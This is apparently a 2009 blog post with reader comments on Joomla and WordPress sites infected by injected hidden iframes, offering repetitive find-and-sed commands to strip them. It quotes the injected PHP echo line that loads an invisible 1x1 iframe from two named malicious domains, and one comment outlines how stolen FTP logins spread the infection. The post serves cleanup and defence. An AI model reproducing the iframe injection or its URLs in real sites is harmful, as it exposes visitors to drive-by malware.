11 Comments Posted on April 13th, 2009 by msamir

joomla and wordpress virus

Category: Security, Tags:

Last days my brother site (used joomla CMS) affected by Malicious Iframe in all html, php files
He say while he working in his own site the anti-virus start to complain about HTML/Framer virus every time load his home page, After fast check i find his site was victim of malicious inject
joomla and many other web CMS  can be infected with this kind of attack
Example malicious site:

http://internetcountercheck.com

http://thedeadpit.com

Example lines

echo “<iframe src=”http://thedeadpit.com/?click=4859468” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;

Solution:

find ./ -name index.html -exec sed -i -e ’s#<iframe src=”http://thedeadpit.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name default.php -exec sed -i -e ’s#echo “<iframe src=\”http://thedeadpit.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;

find ./ -name default.php -exec sed -i -e ’s#echo “<iframe src=\”http://internetcountercheck.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;
find ./ -name index.php -exec sed -i -e ’s#echo “<iframe src=\”http://internetcountercheck.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;
find ./ -name default.php -exec sed -i -e ’s#echo “<iframe src=\”http://internetcountercheck.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;
find ./ -name index.php -exec sed -i -e ’s#echo “<iframe src=\”http://internetcountercheck.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;
find ./ -name index.html -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name index.htm -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name index.htm -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name *.htm -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name *.html -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name *.html -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name *.htm -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name *.html -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name index.html -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name index.html -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name *.htm -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name *.html -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name “*.html” -exec sed -i -e ’s#<iframe src=”http://internetcountercheck.com/?click=[0-9]*” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>##g’ {} ;
find ./ -name default.php -exec sed -i -e ’s#echo “<iframe src=\”http://internetcountercheck.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;
find ./ -name *.php -exec sed -i -e ’s#echo “<iframe src=\”http://internetcountercheck.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;
find ./ -name “*.php” -exec sed -i -e ’s#echo “<iframe src=\”http://internetcountercheck.com/?click=[0-9]*\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;##g’ {} ;

11 Responses to “joomla and wordpress virus”

Premasis on April 23rd, 2009 11:01 am:

Our website is hacked with the same iframe script. Do not know how to clean it. HELP!!! of you have solution.

Mohamed Elsayed on June 10th, 2009 3:11 pm:

The solution is to replace all of Joomla files with a clean and latest version.
Replace all index.html files that included by default with Joomla with a clean one.

Regards
sava93.com owner

Jonathan Kinney on June 19th, 2009 11:50 am:

This type of infection starts at the end user’s computer, they visit a site with these tags, which leads to a site that infects the end user’s computer via exploits through javascript in a .pdf or .swf (yes, Adobe Reader and shockwave are both exploitable, update them), and then the computer runs malicious code reporting all used and found FTP logins to central server, which then periodically downloads files from all said sites, inserts code, and then uploads the modified files. Javascript in .pdf files was a bad idea in the first place… Make sure you have the latest version as shown on Adobe’s site, the updater sucks, and will often leave you several exploitable versions back. Just a heads up.

Agli on August 6th, 2009 8:15 am:

Please can anyone help me how can i execute this scripts in my server?

msamir on August 7th, 2009 3:41 am:

put them in bash script and run it
or copy and past in your shell

Agli on August 12th, 2009 4:11 pm:

Thank you msamir.

CL on October 5th, 2009 10:23 am:

The solution is to replace all of Joomla files with a clean and latest version.
Replace all index.html files that included by default with Joomla with a clean one.
Regards
sava93.com owner

mutualfunds on October 6th, 2009 12:20 pm:

Hey, I found your blog while searching on Google your post looks very interesting for me. I will add a backlink and bookmark your site. Keep up the good work!

Harlin on November 3rd, 2009 10:57 pm:

Has anyone replaced all index.html files with clean html files and found solution?

diet on January 17th, 2010 4:29 pm:

Thank you msamir. im an expert in viruses, and found your post usefull

Mohamed Elsayed on February 4th, 2010 10:02 am:

Hello,

I told you before to replace all of Joomla files with a clean and latest version.
Replace all index.html files that included by default with Joomla with a clean one.

Regards
sava93.com owner

Leave a Reply